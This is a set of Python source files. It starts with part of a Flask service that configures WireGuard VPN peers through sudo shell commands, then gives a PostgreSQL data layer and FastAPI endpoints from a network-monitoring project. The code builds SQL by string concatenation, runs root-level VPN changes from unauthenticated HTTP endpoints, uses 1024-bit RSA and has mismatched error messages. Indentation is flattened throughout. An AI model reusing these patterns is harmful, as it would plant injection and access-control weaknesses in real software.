secret = os.getenv('KEY')
# WireGuard installation
os.system("sudo add-apt-repository ppa:wireguard/wireguard")
os.system("sudo apt-get update -y")
os.system("sudo apt-get install -y wireguard-dkms wireguard-tools linux-headers-$(uname -r) openresolv")
# Generate public/private key pairs and store them
#os.system("umask 077")
#os.system("wg genkey | tee private_key | wg pubkey > public_key")
os.system("cat private_key | wg pubkey > public_key")
private_key = get_private_key()
# Generate server configuration
config = open("/etc/wireguard/wg0.conf", "w")
config.write("[Interface]\n")
config.write("Address = " + ip_range + "\n")
config.write("SaveConfig = " + str(False) + "\n")
config.write("ListenPort = " + str(port) + "\n")
config.write("PrivateKey = " + private_key + "\n")
config.write(
"PostUp = " + "iptables -A FORWARD -i wg0 -j ACCEPT; iptables -t nat -A POSTROUTING -o " + net_interface + " -j MASQUERADE; ip6tables -A FORWARD -i wg0 -j ACCEPT; ip6tables -t nat -A POSTROUTING -o " + net_interface + " -j MASQUERADE" + "\n")
        # PostDown removes the rules that PostUp added
        config.write(
            "PostDown = " + "iptables -D FORWARD -i wg0 -j ACCEPT; iptables -t nat -D POSTROUTING -o " + net_interface + " -j MASQUERADE; ip6tables -D FORWARD -i wg0 -j ACCEPT; ip6tables -t nat -D POSTROUTING -o " + net_interface + " -j MASQUERADE" + "\n")
config.write("\n\n")
config.close()
os.system("sudo wg-quick up wg0")
os.system("sudo systemctl enable <EMAIL>")
# Store VPN port
set_vpn_port(port)
# Store interface generated
set_n_gateway(0)
file=open("ip_management","w")
file.write(ip_range.split("/")[0]+"\n")
file.close()
# Server rules forwarding
os.system("sudo iptables -A INPUT -m conntrack --ctstate RELATED,ESTABLISHED -j ACCEPT")
os.system("sudo iptables -A FORWARD -m conntrack --ctstate RELATED,ESTABLISHED -j ACCEPT")
os.system("sudo iptables -A INPUT -p udp -m udp --dport 51820 -m conntrack --ctstate NEW -j ACCEPT")
os.system("sudo iptables -A INPUT -s %s -p tcp -m tcp -m conntrack --ctstate NEW -j ACCEPT" % ip_range)
os.system("sudo iptables -A INPUT -s %s -p udp -m udp -m conntrack --ctstate NEW -j ACCEPT" % ip_range)
os.system("sudo iptables -A FORWARD -i wg0 -o wg0 -m conntrack --ctstate NEW -j ACCEPT")
os.system("sudo iptables -t nat -A POSTROUTING -o %s -j MASQUERADE" % net_interface)
os.system("sudo apt-get install -y iptables-persistent")
os.system("sudo systemctl enable netfilter-persistent")
os.system("sudo netfilter-persistent save")
file = open("/etc/sysctl.conf", "a")
file.write("net.ipv4.ip_forward=1\n")
file.close()
os.system("sudo sysctl -p")
class get_configuration(Resource):
def get(self):
with open("/etc/wireguard/wg0.conf", "r") as confi:
for line in confi:
if "Address =" in line:
ip_range = line.split("= ")[1]
        # Dummy DID for now; the simulated DLT needs to be considered for storing this information.
data = {
"did": "did:5gzorro:dummy12345",
"public_key": get_public_key(),
"IP_range": ip_range,
"vpn_port":get_vpn_port()
}
return json.dumps(data)
class add_client(Resource):
def post(self):
req = request.data.decode("utf-8")
req = json.loads(req)
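        # Illustrative request body (assumed values):
        # {"client_public_key": "<peer-public-key>"}
        # The response carries the VPN address assigned to the client, the server VPN port and the
        # server public key, e.g. {"assigned_ip": "10.0.0.2", "vpn_port": 51820, "server_public_key": "..."}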
client_public_key = req["client_public_key"]
#IP_range_to_redirect = req["IP_range_to_redirect"]
assigned_ip = get_next_IP_available_2()
config = open("/etc/wireguard/wg0.conf", "a")
config.write("[Peer]\n")
config.write("PublicKey = " + client_public_key+"\n")
config.write("AllowedIPs = " + assigned_ip + "/32\n")
config.write("\n")
config.close()
server_public_key = get_public_key()
#server_public_key = requests.get("http://172.28.3.153:6200/authentication/public_key")
vpn_port= get_vpn_port()
res = {"assigned_ip": assigned_ip, "vpn_port":vpn_port, "server_public_key": server_public_key}
        # See how to avoid restarting the interface
os.system("sudo wg-quick down wg0 && sudo wg-quick up wg0")
return res
class remove_client(Resource):
def post(self):
req = request.data.decode("utf-8")
req = json.loads(req)
client_public_key = req["client_public_key"]
config_line=-100
ip_vpn = ""
with open("/etc/wireguard/wg0.conf","r") as file:
for num, line in enumerate(file, 1):
if client_public_key in line:
config_line = num
if num == config_line+1:
ip_vpn = line.split(" = ")[1]
ip_vpn = ip_vpn.split("/")[0]
if config_line != -100 and ip_vpn != "":
os.system("sudo sed -i '"+str(config_line+1)+"d' /etc/wireguard/wg0.conf")
os.system("sudo sed -i '"+str(config_line)+"d' /etc/wireguard/wg0.conf")
os.system("sudo sed -i '"+str(config_line-1)+"d' /etc/wireguard/wg0.conf")
liberate_free_ip(ip_vpn)
        # See how to avoid restarting the interface
os.system("sudo wg-quick down wg0 && sudo wg-quick up wg0")
return 200
class connect_to_VPN(Resource):
def post(self):
req = request.data.decode("utf-8")
req = json.loads(req)
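        # Illustrative request body (assumed values):
        # {"ip_address_server": "203.0.113.10", "port_server": 5000, "IP_range_to_redirect": "10.0.0.0/24"}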
ip_address_server = req["ip_address_server"]
port_server = req["port_server"]
IP_range_to_redirect = req["IP_range_to_redirect"]
client_public_key = get_public_key()
req = {"client_public_key": client_public_key}
headers = {"Content-Type" : "application/json"}
res = requests.post("http://" + str(ip_address_server) + ":" + str(port_server) + "/add_client",
data=json.dumps(req).encode("utf-8"), headers=headers, timeout=10)
res = json.loads(res.text)
assigned_ip = res["assigned_ip"]
server_public_key = res["server_public_key"]
vpn_port = res["vpn_port"]
#n_gate = get_n_gateway()
#n_gate = n_gate + 1
n_gate = 99999
interfaces_reserved = []
try:
with open("interface_server_associations", "r") as file:
for line in file:
interfaces_reserved.append(str(line.split(":")[0]))
for x in range(1,10):
if str(x) not in interfaces_reserved:
n_gate = x
break
except IOError:
n_gate = 1
client_private_key = get_private_key()
config = open("/etc/wireguard/wg" + str(n_gate) + ".conf", "w")
config.write("[Interface]\n")
config.write("Address = " + assigned_ip + "/32\n")
config.write("PrivateKey = " + client_private_key + "\n")
config.write("DNS = 8.8.8.8\n\n")
config.write("[Peer]\n")
config.write("PublicKey = " + server_public_key + "\n")
config.write("Endpoint = " + ip_address_server + ":" + str(vpn_port) + "\n")
config.write("AllowedIPs = "+ IP_range_to_redirect + "\n")
config.write("\n")
config.close()
set_n_gateway(n_gate)
store_interface_server_association(n_gate, ip_address_server, port_server)
os.system("sudo wg-quick up wg" + str(n_gate))
return 200
class disconnect_to_VPN(Resource):
def post(self):
req = request.data.decode("utf-8")
req = json.loads(req)
ip_address_server = req["ip_address_server"]
port_server = req["port_server"]
n_gate = get_interface_server_association(ip_address_server, port_server)
client_public_key = get_public_key()
req = {"client_public_key": client_public_key}
res = requests.post("http://" + str(ip_address_server) + ":" + str(port_server) + '/remove_client',
data=json.dumps(req).encode("utf-8"))
if res.status_code == 200:
os.system("sudo wg-quick down wg" + str(n_gate))
os.system("rm /etc/wireguard/wg" + str(n_gate) + ".conf")
config_line = -100
with open("interface_server_associations","r") as file:
for num, line in enumerate(file,1):
if str(n_gate) in line.split(":")[0]:
config_line = num
if config_line != -100:
os.system("sudo sed -i '"+str(config_line)+"d' interface_server_associations")
return 200
def launch_server_REST(port):
#api.app.run(ssl_context=('cert.pem','key.pem'))
api.add_resource(launch, '/launch')
api.add_resource(get_configuration, '/get_configuration')
api.add_resource(add_client, '/add_client')
api.add_resource(remove_client, '/remove_client')
api.add_resource(connect_to_VPN, '/connect_to_VPN')
api.add_resource(disconnect_to_VPN, '/disconnect_to_VPN')
http_server = WSGIServer(('0.0.0.0', port), app)
http_server.serve_forever()
if __name__ == "__main__":
if len(sys.argv)!=2:
print("Usage: python3 app_api.py [port]")
else:
port=int(sys.argv[1])
launch_server_REST(port)
``` |
{
"source": "5GZORRO/mda",
"score": 2
} |
#### File: mda/app/database.py
```python
from .main import *
engine = create_engine('postgresql+psycopg2://' + POSTGRES_USER + ':' + POSTGRES_PASSWORD + '@' + POSTGRES_HOST + ':' + POSTGRES_PORT + '/' + POSTGRES_DB, pool_size=num_fetch_threads+num_fetch_threads_agg, convert_unicode=True)
# Create database if it does not exist.
if not database_exists(engine.url):
create_database(engine.url)
db_session = scoped_session(sessionmaker(autocommit=False, autoflush=False, bind=engine))
Base = declarative_base()
Base.query = db_session.query_property()
class Config(Base):
__tablename__ = 'config'
_id = Column(postgresql.UUID(as_uuid=True), primary_key=True, default=uuid.uuid4, unique=True)
created_at = Column(DateTime, default=datetime.datetime.now)
updated_at = Column(DateTime, nullable=True)
transaction_id = Column(String(256), nullable=False)
instance_id = Column(String(256), nullable=True)
product_id = Column(String(256), nullable=True)
kafka_topic = Column(String(256), nullable=False)
monitoring_endpoint = Column(String(256), nullable=False)
network_slice_id = Column(String(256), nullable=True)
tenant_id = Column(String(256), nullable=False)
resource_id = Column(String(256), nullable=False)
parent_id = Column(String(256), nullable=True)
timestamp_start = Column(DateTime, nullable=False)
timestamp_end = Column(DateTime, nullable=True)
status = Column(Integer, default=1)
metrics = relationship("Metric")
def __init__(self, transaction_id, kafka_topic, network_slice_id, timestamp_start, timestamp_end, tenant_id, resource_id, parent_id, monitoring_endpoint, instance_id, product_id):
self.transaction_id = transaction_id
self.instance_id = instance_id
self.product_id = product_id
self.kafka_topic = kafka_topic
self.network_slice_id = network_slice_id
self.timestamp_start = timestamp_start
self.timestamp_end = timestamp_end
self.tenant_id = tenant_id
self.resource_id = resource_id
self.parent_id = parent_id
self.monitoring_endpoint = monitoring_endpoint
def toString(self):
return ({'id': self._id,
'created_at': self.created_at,
'updated_at': self.updated_at,
'transaction_id': self.transaction_id,
'instance_id': self.instance_id,
'product_id': self.product_id,
'topic': self.kafka_topic,
'monitoring_endpoint': self.monitoring_endpoint,
'timestamp_start': self.timestamp_start,
'timestamp_end': self.timestamp_end,
'metrics': [],
'status': self.status,
'tenant_id' : self.tenant_id,
'context_ids': [
{
'resource_id': self.resource_id,
'network_slice_id': self.network_slice_id,
'parent_id' : self.parent_id
}
]})
class Metric(Base):
__tablename__ = 'metric'
_id = Column(postgresql.UUID(as_uuid=True), primary_key=True, default=uuid.uuid4, unique=True)
config_id = Column(postgresql.UUID(as_uuid=True), ForeignKey('config._id'))
metric_name = Column(String(256), nullable=False)
metric_type = Column(String(256), nullable=False)
aggregation_method = Column(String(256), nullable=True)
step = Column(String(256), nullable=False)
step_aggregation = Column(String(256), nullable=True)
next_run_at = Column(DateTime, nullable=False)
next_aggregation = Column(DateTime, nullable=True)
status = Column(Integer, default=1)
values = relationship("Value", cascade="all, delete")
def __init__(self, metric_name, metric_type, aggregation_method, step, step_aggregation, config_id, next_run_at, next_aggregation):
self.metric_name = metric_name
self.metric_type = metric_type
self.aggregation_method = aggregation_method
self.step = step
self.step_aggregation = step_aggregation
self.config_id = config_id
self.next_run_at = next_run_at
self.next_aggregation = next_aggregation
def toString(self):
return ({'metric_name': self.metric_name,
'metric_type': self.metric_type,
'aggregation_method': self.aggregation_method,
'step': self.step,
'step_aggregation': self.step_aggregation,
'next_run_at': self.next_run_at,
'next_aggregation': self.next_aggregation})
class Value(Base):
__tablename__ = 'value'
timestamp = Column(DateTime, nullable=False, primary_key=True)
metric_id = Column(postgresql.UUID(as_uuid=True), ForeignKey('metric._id'), primary_key=True)
metric_value = Column(Float, nullable=False)
def __init__(self, timestamp, metric_id, metric_value):
self.timestamp = timestamp
self.metric_id = metric_id
self.metric_value = metric_value
# ----------------------------------------------------------------#
seconds_per_unit = {"s": 1, "m": 60, "h": 3600, "d": 86400, "w": 604800}
def convert_to_seconds(s):
return int(s[:-1]) * seconds_per_unit[s[-1]]
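# Illustrative examples: convert_to_seconds("30s") -> 30, convert_to_seconds("5m") -> 300,
# convert_to_seconds("2h") -> 7200.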
def add_config(config: Config_Model, orchestrator, aggregator):
try:
row = Config(config.transaction_id, config.topic, config.context_ids[0].network_slice_id, config.timestamp_start, config.timestamp_end, config.tenant_id, config.context_ids[0].resource_id, config.context_ids[0].parent_id, config.monitoring_endpoint, config.instance_id, config.product_id)
db_session.add(row)
db_session.commit()
response = row.toString()
for metric in config.metrics:
aggregation = None
if metric.step_aggregation != None:
sec_to_add = convert_to_seconds(metric.step_aggregation)
aggregation = row.timestamp_start + relativedelta(seconds=sec_to_add)
row_m = Metric(metric.metric_name, metric.metric_type, metric.aggregation_method, metric.step, metric.step_aggregation, row._id, row.timestamp_start, aggregation)
db_session.add(row_m)
db_session.commit()
# Add to queue
orchestrator.wait_queue.put((row_m.next_run_at, row.timestamp_start, row_m.step, row.timestamp_end, row_m._id, row_m.metric_name, row_m.metric_type, row_m.aggregation_method, row.transaction_id, row.kafka_topic, row.network_slice_id, row.tenant_id, row.resource_id, row_m.step_aggregation, row_m.next_aggregation, row.monitoring_endpoint, config.instance_id, config.product_id))
if row_m.aggregation_method != None:
aggregator.wait_queue_agg.put((row_m.next_aggregation, row.timestamp_start, row_m.step, row.timestamp_end, row_m._id, row_m.metric_name, row_m.metric_type, row_m.aggregation_method, row.transaction_id, row.kafka_topic, row.network_slice_id, row.tenant_id, row.resource_id, row_m.step_aggregation, row_m.next_aggregation, config.instance_id, config.product_id))
response['metrics'].append(row_m.toString())
return response
except Exception as e:
print(e)
return -1
def get_config(config_id):
try:
config = Config.query.filter_by(_id=config_id).first()
if config == None:
return 0
response = config.toString()
metrics = Metric.query.filter_by(config_id=config_id).all()
[response['metrics'].append(metric.toString()) for metric in metrics]
return response
except Exception as e:
print(e)
return -1
def get_configs():
try:
configs = Config.query.all()
response = []
for config in configs:
add_metrics = config.toString()
metrics = Metric.query.filter_by(config_id=config._id).all()
[add_metrics['metrics'].append(metric.toString()) for metric in metrics]
response.append(add_metrics)
return response
except Exception as e:
print(e)
return -1
def delete_metric_queue(metric_id, orchestrator, aggregator):
index = True
while(index):
index = False
for i in range(len(orchestrator.wait_queue.queue)):
if orchestrator.wait_queue.queue[i][4] == metric_id:
del orchestrator.wait_queue.queue[i]
index = True
break
for i in range(len(aggregator.wait_queue_agg.queue)):
if aggregator.wait_queue_agg.queue[i][4] == metric_id:
del aggregator.wait_queue_agg.queue[i]
index = True
break
for i in range(len(orchestrator.metrics_queue.queue)):
if orchestrator.metrics_queue.queue[i][4] == metric_id:
del orchestrator.metrics_queue.queue[i]
index = True
break
for i in range(len(aggregator.aggregation_queue.queue)):
if aggregator.aggregation_queue.queue[i][4] == metric_id:
del aggregator.aggregation_queue.queue[i]
index = True
break
return
def update_config(config_id, config, orchestrator, aggregator):
try:
row = Config.query.filter_by(_id=config_id).first()
if row == None:
return 0
if config.timestamp_end == None and config.metrics == None:
return 1
if config.timestamp_end != None and row.timestamp_end != None and config.timestamp_end <= row.timestamp_end:
return 2
now = datetime.datetime.now()
row.updated_at = now
# Update config
if config.timestamp_end != None:
row.timestamp_end = config.timestamp_end
db_session.commit()
response = row.toString()
# Update metrics
# Delete old metrics
metrics = Metric.query.filter_by(config_id=config_id).all()
for metric in metrics:
delete_metric_queue(metric._id, orchestrator, aggregator)
db_session.delete(metric)
if config.metrics != None:
#Create new metrics
for metric in config.metrics:
aggregation = None
if metric.step_aggregation != None:
sec_to_add = convert_to_seconds(metric.step_aggregation)
aggregation = now + relativedelta(seconds=sec_to_add)
row_m = Metric(metric.metric_name, metric.metric_type, metric.aggregation_method, metric.step, metric.step_aggregation, row._id, now, aggregation)
db_session.add(row_m)
db_session.commit()
# Add to queue
orchestrator.wait_queue.put((row_m.next_run_at, row.timestamp_start, row_m.step, row.timestamp_end, row_m._id, row_m.metric_name, row_m.metric_type, row_m.aggregation_method, row.transaction_id, row.kafka_topic, row.network_slice_id, row.tenant_id, row.resource_id, row_m.step_aggregation, row_m.next_aggregation, row.monitoring_endpoint, config.instance_id, config.product_id))
if row_m.aggregation_method != None:
aggregator.wait_queue_agg.put((row_m.next_aggregation, row.timestamp_start, row_m.step, row.timestamp_end, row_m._id, row_m.metric_name, row_m.metric_type, row_m.aggregation_method, row.transaction_id, row.kafka_topic, row.network_slice_id, row.tenant_id, row.resource_id, row_m.step_aggregation, row_m.next_aggregation, config.instance_id, config.product_id))
response['metrics'].append(row_m.toString())
return response
return get_config(config_id)
except Exception as e:
print(e)
return -1
def update_next_run(metric_id, next_run_at):
try:
metric = Metric.query.filter_by(_id=metric_id).first()
config = Config.query.filter_by(_id=metric.config_id).first()
sec_to_add = convert_to_seconds(metric.step)
next = next_run_at + relativedelta(seconds=sec_to_add)
if config.timestamp_end != None and next > config.timestamp_end:
metric.status = 0
db_session.commit()
else:
metric.next_run_at = next
db_session.commit()
return 1
except Exception as e:
print(e)
return -1
def update_aggregation(metric_id, next_aggregation):
try:
metric = Metric.query.filter_by(_id=metric_id).first()
config = Config.query.filter_by(_id=metric.config_id).first()
sec_to_add = convert_to_seconds(metric.step_aggregation)
next = next_aggregation + relativedelta(seconds=sec_to_add)
if config.timestamp_end != None and next > config.timestamp_end:
metric.status = 0
db_session.commit()
else:
metric.next_aggregation = next
db_session.commit()
return 1
except Exception as e:
print(e)
return -1
def enable_config(config_id, orchestrator, aggregator):
try:
config = Config.query.filter_by(_id=config_id).first()
if config == None or (config.timestamp_end != None and config.timestamp_end < datetime.datetime.now()):
return 0
if config.status == 1:
return 1
config.status = 1
now = datetime.datetime.now()
config.updated_at = now
add_metrics = config.toString()
metrics = Metric.query.filter_by(config_id=config._id).all()
for metric in metrics:
metric.status = 1
metric.next_run_at = now
orchestrator.wait_queue.put((metric.next_run_at, config.timestamp_start, metric.step, config.timestamp_end, metric._id, metric.metric_name, metric.metric_type, metric.aggregation_method, config.transaction_id, config.kafka_topic, config.network_slice_id, config.tenant_id, config.resource_id, metric.step_aggregation, metric.next_aggregation, config.monitoring_endpoint, config.instance_id, config.product_id))
if metric.aggregation_method != None:
sec_to_add = convert_to_seconds(metric.step_aggregation)
metric.next_aggregation = now + relativedelta(seconds=sec_to_add)
aggregator.wait_queue_agg.put((metric.next_aggregation, config.timestamp_start, metric.step, config.timestamp_end, metric._id, metric.metric_name, metric.metric_type, metric.aggregation_method, config.transaction_id, config.kafka_topic, config.network_slice_id, config.tenant_id, config.resource_id, metric.step_aggregation, metric.next_aggregation, config.instance_id, config.product_id))
add_metrics['metrics'].append(metric.toString())
db_session.commit()
return add_metrics
except Exception as e:
print(e)
return -1
def disable_config(config_id, orchestrator, aggregator):
try:
config = Config.query.filter_by(_id=config_id).first()
if config == None:
return 0
if config.status == 0:
return 1
config.status = 0
config.updated_at = datetime.datetime.now()
add_metrics = config.toString()
metrics = Metric.query.filter_by(config_id=config._id).all()
for metric in metrics:
metric.status = 0
add_metrics['metrics'].append(metric.toString())
delete_metric_queue(metric._id, orchestrator, aggregator)
db_session.commit()
return add_metrics
except Exception as e:
print(e)
return -1
def delete_config(config_id, orchestrator, aggregator):
try:
config = Config.query.filter_by(_id=config_id).first()
if config == None:
return 0
metrics = Metric.query.filter_by(config_id=config._id).all()
for metric in metrics:
delete_metric_queue(metric._id, orchestrator, aggregator)
db_session.delete(metric)
db_session.delete(config)
db_session.commit()
return 1
except Exception as e:
print(e)
return -1
def load_database_metrics(orchestrator, aggregator):
try:
# Update old metrics and next executions
now = datetime.datetime.now()
db_session.execute("UPDATE config " \
"SET status = 0 " \
"WHERE status = 1 AND timestamp_end < '"+str(now)+"'; " \
"UPDATE metric " \
"SET next_run_at = '"+str(now)+"', " \
"next_aggregation = CASE WHEN aggregation_method is not null " \
"THEN '"+str(now)+"'::timestamp + step_aggregation::interval END " \
"FROM config c " \
"WHERE c.status = 1 AND next_run_at < '"+str(now)+"';");
db_session.commit()
# Get metrics
result = db_session.execute("SELECT next_run_at, metric_name, metric_type, aggregation_method, step, transaction_id, instance_id, product_id, kafka_topic, network_slice_id, " \
"tenant_id, resource_id, timestamp_start, timestamp_end, metric._id, step_aggregation, " \
"next_aggregation, monitoring_endpoint " \
"FROM metric join config on metric.config_id = config._id " \
"WHERE metric.status = 1;")
for row in result:
orchestrator.wait_queue.put((row['next_run_at'], row['timestamp_start'], row['step'], row['timestamp_end'], row['_id'], row['metric_name'], row['metric_type'], row['aggregation_method'], row['transaction_id'], row['kafka_topic'], row['network_slice_id'], row['tenant_id'], row['resource_id'], row['step_aggregation'], row['next_aggregation'], row['monitoring_endpoint'], row['instance_id'], row['product_id']))
if row['aggregation_method'] != None:
aggregator.wait_queue_agg.put((row['next_aggregation'], row['timestamp_start'], row['step'], row['timestamp_end'], row['_id'], row['metric_name'], row['metric_type'], row['aggregation_method'], row['transaction_id'], row['kafka_topic'], row['network_slice_id'], row['tenant_id'], row['resource_id'], row['step_aggregation'], row['next_aggregation'], row['instance_id'], row['product_id']))
return 1
except Exception as e:
print(e)
return -1
def insert_metric_value(metric_id, metric_value, timestamp):
try:
row = Value(timestamp, metric_id, metric_value)
db_session.add(row)
db_session.commit()
return 1
except Exception as e:
print(e)
return -1
''' Not used now
def create_aggregate_view(metric_id, aggregation_method, step_aggregation):
global db_session
db_session.execute("CREATE VIEW \"agg_"+str(metric_id)+"_"+aggregation_method+"\" " \
"WITH (timescaledb.continuous) AS " \
"SELECT time_bucket(\'"+step_aggregation+"\', timestamp) AS bucket, "+aggregation_method+"(metric_value) AS aggregation " \
"FROM value " \
"WHERE metric_id = '"+str(metric_id)+"' " \
"GROUP BY bucket;")
db_session.commit()
return
def drop_aggregate_view(metric_id, aggregation_method):
db_session.execute("DROP VIEW IF EXISTS \"agg_"+str(metric_id)+"_"+aggregation_method+"\" CASCADE;")
db_session.commit()
return
'''
def get_last_aggregation(metric_id, aggregation_method, bucket, step_aggregation):
#result = db_session.execute("REFRESH VIEW \"agg_"+str(metric_id)+"_"+aggregation_method+"\";" \
# "SELECT * FROM \""+str(metric_id)+"_"+aggregation_method+"\" LIMIT 1;").fetchone()
result = db_session.execute("SELECT "+aggregation_method+"(metric_value) " \
"FROM value " \
"WHERE metric_id = '"+str(metric_id)+"' and timestamp < '"+str(bucket)+"'::timestamp " \
"and timestamp >= ('"+str(bucket)+"'::timestamp - interval '"+str(step_aggregation)+"');").fetchone()
return result[0]
def create_index():
#db_session.execute("CREATE EXTENSION IF NOT EXISTS timescaledb CASCADE;" \
# "CREATE INDEX value_index ON value (timestamp ASC, metric_id);" \
# "SELECT create_hypertable('value', 'timestamp', if_not_exists => TRUE);")
db_session.execute("CREATE INDEX value_index ON value (timestamp ASC, metric_id);")
db_session.commit()
return
'''
def drop_all_views():
global db_session
result = db_session.execute("SELECT 'DROP VIEW \"' || table_name || '\" CASCADE;' " \
"FROM information_schema.views " \
"WHERE table_schema NOT IN ('pg_catalog', 'information_schema') AND " \
"table_name !~ '^pg_' AND table_name LIKE 'agg_%';")
for row in result:
try:
db_session.execute(row[0])
except Exception:
pass
db_session.commit()
return
'''
def close_connection():
db_session.remove()
return
def reload_connection():
    global db_session
    db_session.remove()
    db_session = scoped_session(sessionmaker(autocommit=False, autoflush=False, bind=engine))
    return
# ----------------------------------------------------------------#
# Reset db if env flag is True
if RESET_DB.lower() == 'true':
try:
try:
db_session.commit()
Base.metadata.drop_all(bind=engine)
except Exception as e:
print(e)
Base.metadata.create_all(bind=engine)
db_session.commit()
create_index()
except Exception as e:
print(e)
sys.exit(0)
# Create db if not exists
try:
resp1 = Config.query.first()
resp2 = Metric.query.first()
resp3 = Value.query.first()
except Exception as e:
try:
Base.metadata.create_all(bind=engine)
db_session.commit()
create_index()
except Exception as e:
print(e)
sys.exit(0)
```
#### File: mda/app/endpoints.py
```python
from .main import *
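# Illustrative request body (assumed values) for POST /settings; the accepted values for
# data_source_type, aggregation_method and the step/step_aggregation units come from
# resources_options, agg_options and step_options defined in main:
# {
#   "transaction_id": "trans-001", "tenant_id": "operator-a", "data_source_type": "prometheus",
#   "topic": "mda-metrics", "monitoring_endpoint": "http://prometheus:9090",
#   "instance_id": null, "product_id": null,
#   "timestamp_start": "2021-06-01T00:00:00", "timestamp_end": null,
#   "context_ids": [{"resource_id": "res-1", "network_slice_id": "slice-1", "parent_id": null}],
#   "metrics": [{"metric_name": "cpu_load", "metric_type": "gauge",
#                "aggregation_method": "avg", "step": "30s", "step_aggregation": "5m"}]
# }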
@app.post("/settings", status_code=201, responses={201: {"model": Response_Config_Model, "content": {"application/json": { "example": json_response_enable}}}, 404: {"model": Response_Error_Model, "content": {"application/json": { "example": {"status": "Error", "message": "Error message."}}}}})
async def set_param(config: Config_Model):
config.data_source_type = config.data_source_type.upper()
if config.data_source_type not in resources_options:
return JSONResponse(status_code=404, content={"status": "Error", "message": "Aggregation step options is "+str(agg_options)+"."})
if config.timestamp_start == None:
config.timestamp_start = datetime.datetime.now()
if config.timestamp_end != None and config.timestamp_start > config.timestamp_end:
return JSONResponse(status_code=404, content={"status": "Error", "message": "Timestamp start need to be after timestamp end."})
for metric in config.metrics:
if metric.aggregation_method != None:
metric.aggregation_method = metric.aggregation_method.upper()
if metric.aggregation_method not in agg_options:
return JSONResponse(status_code=404, content={"status": "Error", "message": "Aggregation step options is "+str(agg_options)+"."})
        if (metric.step_aggregation != None and metric.step_aggregation[-1] not in step_options) or metric.step[-1] not in step_options:
            return JSONResponse(status_code=404, content={"status": "Error", "message": "Step and step aggregation unit options are "+str(step_options)+"."})
# create public/private keys if not created
if config.tenant_id not in public_private_keys:
public_key, private_key = rsa.newkeys(1024)
public_private_keys[config.tenant_id] = {"public_key": public_key, "private_key": private_key}
# Save config in database
resp = add_config(config, orchestrator, aggregator)
if resp == -1:
return JSONResponse(status_code=404, content={"status": "Error", "message": "Error in create config in database."})
orchestrator.update_queue_flag = True
aggregator.update_queue_flag_agg = True
info_log(200, f'Monitoring spec successfully created by operator {config.tenant_id}')
return resp
@app.get("/settings/{config_id}", responses={200: {"model": Response_Config_Model, "content": {"application/json": { "example": json_response_enable}}}, 404: {"model": Response_Error_Model, "content": {"application/json": { "example": {"status": "Error", "message": "Error message."}}}}})
async def get_config_id(config_id):
# Get config by id
if validate_uuid4(config_id) is False:
return JSONResponse(status_code=404, content={"status": "Error", "message": "Config id invalid."})
resp = get_config(config_id)
if resp == 0:
return JSONResponse(status_code=404, content={"status": "Error", "message": "Config id invalid."})
if resp == -1:
return JSONResponse(status_code=404, content={"status": "Error", "message": "Error in get config in database."})
return resp
@app.get("/settings", responses={200: {"model": List[Response_Config_Model], "content": {"application/json": { "example": [json_response_enable]}}}, 404: {"model": Response_Error_Model, "content": {"application/json": { "example": {"status": "Error", "message": "Error message."}}}}})
async def get_all_configs():
# Get configs
resp = get_configs()
if resp == -1:
return JSONResponse(status_code=404, content={"status": "Error", "message": "Error in get config in database."})
return resp
@app.put("/settings/{config_id}", responses={200: {"model": Response_Config_Model, "content": {"application/json": { "example": json_response_enable}}}, 404: {"model": Response_Error_Model, "content": {"application/json": { "example": {"status": "Error", "message": "Error message."}}}}})
async def update_config_id(config_id, config: Update_Config_Model):
# Update config by id
if validate_uuid4(config_id) is False:
return JSONResponse(status_code=404, content={"status": "Error", "message": "Config id invalid."})
resp = update_config(config_id, config, orchestrator, aggregator)
if resp == 0:
return JSONResponse(status_code=404, content={"status": "Error", "message": "Config id invalid."})
if resp == 1:
return JSONResponse(status_code=404, content={"status": "Error", "message": "Arguments invalid."})
if resp == 2:
return JSONResponse(status_code=404, content={"status": "Error", "message": "Timestamp end must be later than the current time."})
if resp == -1:
return JSONResponse(status_code=404, content={"status": "Error", "message": "Error in update config in database."})
orchestrator.update_queue_flag = True
aggregator.update_queue_flag_agg = True
info_log(200, f'Monitoring spec {config_id} successfully updated')
return resp
@app.put("/settings/{config_id}/enable", responses={200: {"model": Response_Config_Model, "content": {"application/json": { "example": json_response_enable}}}, 404: {"model": Response_Error_Model, "content": {"application/json": { "example": {"status": "Error", "message": "Error message."}}}}})
async def enable_config_id(config_id):
# Enable config by id
if validate_uuid4(config_id) is False:
return JSONResponse(status_code=404, content={"status": "Error", "message": "Config id invalid."})
resp = enable_config(config_id, orchestrator, aggregator)
if resp == 0:
return JSONResponse(status_code=404, content={"status": "Error", "message": "Config id invalid."})
if resp == 1:
return JSONResponse(status_code=404, content={"status": "Error", "message": "Config already enabled."})
if resp == -1:
return JSONResponse(status_code=404, content={"status": "Error", "message": "Error in enable config in database."})
orchestrator.update_queue_flag = True
aggregator.update_queue_flag_agg = True
info_log(200, f'Monitoring spec {config_id} successfully enabled')
return resp
@app.put("/settings/{config_id}/disable", responses={200: {"model": Response_Config_Model, "content": {"application/json": { "example": json_response_disable}}}, 404: {"model": Response_Error_Model, "content": {"application/json": { "example": {"status": "Error", "message": "Error message."}}}}})
async def disable_config_id(config_id):
# Disable config by id
if validate_uuid4(config_id) is False:
return JSONResponse(status_code=404, content={"status": "Error", "message": "Config id invalid."})
resp = disable_config(config_id, orchestrator, aggregator)
if resp == 0:
return JSONResponse(status_code=404, content={"status": "Error", "message": "Config id invalid."})
if resp == 1:
return JSONResponse(status_code=404, content={"status": "Error", "message": "Config already disabled."})
if resp == -1:
return JSONResponse(status_code=404, content={"status": "Error", "message": "Error in disable config in database."})
orchestrator.update_queue_flag = True
aggregator.update_queue_flag_agg = True
info_log(200, f'Monitoring spec {config_id} successfully disabled')
return resp
@app.delete("/settings/{config_id}", status_code=HTTP_204_NO_CONTENT, responses={404: {"model": Response_Error_Model, "content": {"application/json": { "example": {"status": "Error", "message": "Error message."}}}}})
async def delete_config_id(config_id):
# Delete config by id
if validate_uuid4(config_id) is False:
return JSONResponse(status_code=404, content={"status": "Error", "message": "Config id invalid."})
resp = delete_config(config_id, orchestrator, aggregator)
if resp == 0:
return JSONResponse(status_code=404, content={"status": "Error", "message": "Config id invalid."})
if resp == -1:
return JSONResponse(status_code=404, content={"status": "Error", "message": "Error in delete config in database."})
orchestrator.update_queue_flag = True
aggregator.update_queue_flag_agg = True
info_log(200, f'Monitoring spec {config_id} successfully deleted')
return Response(status_code=HTTP_204_NO_CONTENT)
```
